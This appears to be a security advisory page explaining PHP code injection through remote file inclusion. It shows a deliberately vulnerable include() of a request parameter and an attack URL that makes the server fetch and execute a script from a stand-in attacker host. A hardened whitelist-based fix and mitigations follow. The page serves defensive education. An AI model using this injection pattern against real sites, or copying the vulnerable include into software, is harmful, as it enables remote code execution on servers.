DefenseCode

PHP Code Injection

Risk type: HIGH

Description:

A PHP code injection vulnerability allows an attacker to insert malicious PHP code straight into a program or script from an outside source. The injected code becomes part of the application itself and runs with the same permissions as the application.

Example:

Let's assume that a PHP script named "script.php" is reachable at the following URL:

http://www.victim.com/script.php

The page has the following vulnerable code:

... html header ...
<?php
// $page is taken straight from the request (e.g. the "page" query parameter)
// and passed to include() without any validation.
$page = $_GET['page'];
include($page);
?>
... html footer ...

The attacker could host a malicious script ("malicious.php") on some website:

http://www.attacker.com/malicious.php

The code within that script, which the attacker wants to inject, could look like this:

<?php
phpinfo();
?>

The attacker could inject malicious code using the following URL in a browser:

http://www.victim.com/script.php?page=http://www.attacker.com/malicious.php

The end result is that the exploited website executes the phpinfo() call from "malicious.php" within the context of "script.php".

Mitigation:

  • Proper validation of input variables.
  • Use a whitelist of acceptable inputs that strictly conform to specifications.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules.
  • Check for invalid characters and set up all the page files in a separate directory.
  • Use library calls rather than external processes to recreate the desired functionality.
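The following is an added example and not DefenseCode's own code: it places the vulnerable include from the example above beside a hardened replacement that applies the mitigation list (a whitelist of acceptable page names, a syntax check on the input, page files kept in a separate directory, and a path check as defence in depth). The file layout (a "pages" directory holding home.php, about.php and contact.php) and the function names are assumptions made for the illustration.

```php
<?php
// Added example, not DefenseCode's code. Assumed layout: pages/home.php,
// pages/about.php, pages/contact.php next to this script.

// --- Vulnerable form: the request value reaches include() unchanged ---
function vulnerable_include(string $page): void
{
    // A value such as "http://www.attacker.com/malicious.php" is fetched and
    // executed here when allow_url_include is enabled; a local path would be
    // included as-is.
    include($page);
}

// --- Hardened form: whitelist lookup + separate directory + realpath check ---
const PAGES_DIR = __DIR__ . '/pages';

// Whitelist: request value -> file name. Anything not listed is rejected.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

// Returns the absolute path of the page file to include, or null when the
// input is missing, malformed, not whitelisted, or resolves outside PAGES_DIR.
function resolve_page(?string $page): ?string
{
    // Missing or empty input gets a safe default instead of an error path.
    if ($page === null || $page === '') {
        $page = 'home';
    }
    // Syntax check: short lowercase names only, so no '/', '.', ':' or NUL
    // bytes can ever reach the file-system lookup.
    if (!preg_match('/^[a-z]{1,32}$/', $page)) {
        return null;
    }
    // Whitelist check: the value must be one of the known page keys.
    if (!array_key_exists($page, PAGES)) {
        return null;
    }
    // Defence in depth: the resolved file must still live inside PAGES_DIR.
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . PAGES[$page]);
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function hardened_include(?string $page): void
{
    $path = resolve_page($page);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include($path);
}

// Usage: this line replaces the unvalidated include in script.php.
hardened_include($_GET['page'] ?? null);
```

The whitelist does the real work: the request value is only ever used as a lookup key, so no attacker-controlled string is passed to include(). The regular expression and the realpath() comparison are redundant with a correct whitelist, but they make the check fail closed if the PAGES array is later edited carelessly. Independently of the code, the PHP setting allow_url_include should be left at its default of Off, which blocks include() of remote URLs altogether; the remote-inclusion step in the example above depends on it being On.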

Further reading:

https://www.owasp.org/index.php/Code_Injection